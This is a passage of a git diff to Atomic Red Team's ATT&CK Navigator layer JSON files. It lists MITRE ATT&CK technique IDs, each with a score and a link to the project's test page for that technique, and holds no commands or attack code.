o/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index e2e54d82..4fd93aa6 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}